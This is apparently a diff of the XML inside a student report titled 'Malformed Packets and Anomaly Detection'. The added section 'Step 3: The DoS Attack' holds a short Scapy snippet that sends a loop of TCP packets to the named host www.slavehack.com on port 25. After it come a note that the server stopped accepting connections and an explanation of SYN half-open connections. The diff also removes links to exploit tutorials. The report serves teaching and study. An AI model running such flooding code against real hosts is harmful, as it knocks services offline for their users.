+    <w:bookmarkEnd w:id="0"/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step 3: The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>-----------#code--------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = IP(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>dst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>="www.slavehack.com")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = TCP(sport=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>1500,dport</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=25)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>the attack!!!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ans,unans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>srloop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>p,inter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=0.1,retry=2,timeout=4)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E45A84F" wp14:editId="3DF246A2">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>762000</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>3787140</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4474210" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21102"/>
+                    <wp:lineTo x="21520" y="21102"/>
+                    <wp:lineTo x="21520" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="8" name="Text Box 8"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4474210" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">1. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>A basic Ethernet and TCP</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>/</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>IP packet</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="1E45A84F" id="Text Box 8" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:60pt;margin-top:298.2pt;width:352.3pt;height:.05pt;z-index:-251618304;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">1. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>A basic Ethernet and TCP</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>/</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>IP packet</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AEAE7E8" wp14:editId="4B698897">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-373380</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6713220" cy="3773170"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21484"/>
+                <wp:lineTo x="21514" y="21484"/>
+                <wp:lineTo x="21514" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6713220" cy="3773170"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>analysis: server stops accepting SYN connections as shown in the screenshot(DOS.png), thus resulting in denial of service.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>more about DOS attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Client</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sends a TCP SYN (S flag) packet to begin a connection to the server. The target server replies with a TCP SYN-ACK (SA flag) packet, but the client does not respond to the SYN-ACK, leaving the TCP connection “half-open”. In normal operation, the client should send an ACK (a flag) packet followed by the data to be transferred, or an RST reply to reset the connection. On the target server, the connection is kept open, in a “SYN_RECV” state, as the ACK packet may have been lost due to network problems.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2228,184 +4652,9 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Primary Source: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://www.hackingtutorials.org</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Primary Tutorials: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">VNC: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-vnc-auxiliary-modules/</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RUBY: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://www.hackingtutorials.org/metasploit-tutorials/hacking-druby-rmi-server-1-8/</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>VSF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>TPD:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://www.hackingtutorials.org/metasploit-tutorials/exploiting-vsftpd-metasploitable/</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>UnrealIRCD</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:t>https://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson7/index.html</w:t>
-        </w:r>
-      </w:hyperlink>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId14"/>
+      <w:footerReference w:type="default" r:id="rId13"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -2501,7 +4750,7 @@
         <w:sz w:val="26"/>
         <w:szCs w:val="26"/>
       </w:rPr>
-      <w:t>2</w:t>
+      <w:t>1</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -4663,7 +6912,7 @@
   <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7F1E0404"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="8A684D5A"/>
+    <w:tmpl w:val="F5707C40"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -6150,7 +8399,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DC4080E7-019E-4721-8C69-EA4D1E14B1F4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{89C052B3-DD42-4A6F-A2A1-D1992F977555}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Final_1.0.docx
+++ b/Final_1.0.docx
@@ -787,7 +787,7 @@
                                     <w:sz w:val="56"/>
                                     <w:szCs w:val="72"/>
                                   </w:rPr>
-                                  <w:t>Malformed Packets and Anomaly Detecction</w:t>
+                                  <w:t>Malformed Packets and Anomaly Detection</w:t>
                                 </w:r>
                               </w:p>
                               <w:p/>
@@ -828,7 +828,7 @@
                               <w:sz w:val="56"/>
                               <w:szCs w:val="72"/>
                             </w:rPr>
-                            <w:t>Malformed Packets and Anomaly Detecction</w:t>
+                            <w:t>Malformed Packets and Anomaly Detection</w:t>
